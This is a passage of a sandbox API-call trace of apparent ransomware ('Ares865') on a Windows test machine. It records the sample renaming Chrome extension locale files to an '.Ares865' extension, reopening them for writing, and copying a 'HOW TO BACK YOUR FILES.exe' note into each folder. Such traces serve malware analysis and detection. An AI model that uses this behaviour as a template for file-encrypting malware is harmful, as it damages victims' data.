returned="messages.json" [0101.935] lstrlenW (lpString="messages.json") returned 13 [0101.935] lstrlenW (lpString="Ares865") returned 7 [0101.935] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.935] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.Ares865") returned 160 [0101.935] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.937] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=286) returned 1 [0101.940] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl" [0101.940] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl" [0101.940] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.940] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.941] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.941] GetLastError () returned 0x0 [0101.941] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.941] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.941] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.941] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.942] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.942] lstrlenW (lpString="messages.json") returned 13 [0101.942] lstrlenW (lpString="Ares865") returned 7 [0101.942] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.942] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.Ares865") returned 160 [0101.942] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.944] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=172) returned 1 [0101.946] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA" [0101.947] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA" [0101.947] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.947] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.947] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.948] GetLastError () returned 0x0 [0101.948] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.948] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.948] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.948] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.948] lstrlenW (lpString="messages.json") returned 13 [0101.948] lstrlenW (lpString="Ares865") returned 7 [0101.948] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.948] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.Ares865") returned 163 [0101.948] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.950] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=210) returned 1 [0101.953] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr" [0101.953] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr" [0101.953] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.953] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.954] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.954] GetLastError () returned 0x0 [0101.955] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.955] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.955] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.955] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.955] lstrlenW (lpString="messages.json") returned 13 [0101.955] lstrlenW (lpString="Ares865") returned 7 [0101.955] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.955] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.Ares865") returned 160 [0101.955] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.957] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=187) returned 1 [0101.961] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil" [0101.961] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil" [0101.961] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.961] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.962] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.962] GetLastError () returned 0x0 [0101.962] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.962] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.962] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.962] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.963] lstrcpyW (in: lpString1=0x2cce518, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.963] lstrlenW (lpString="messages.json") returned 13 [0101.963] lstrlenW (lpString="Ares865") returned 7 [0101.963] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.Ares865") returned 161 [0101.963] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.964] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=199) returned 1 [0101.968] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi" [0101.968] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi" [0101.968] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.968] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.968] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.969] GetLastError () returned 0x0 [0101.969] lstrcatW (in: lpString1="", 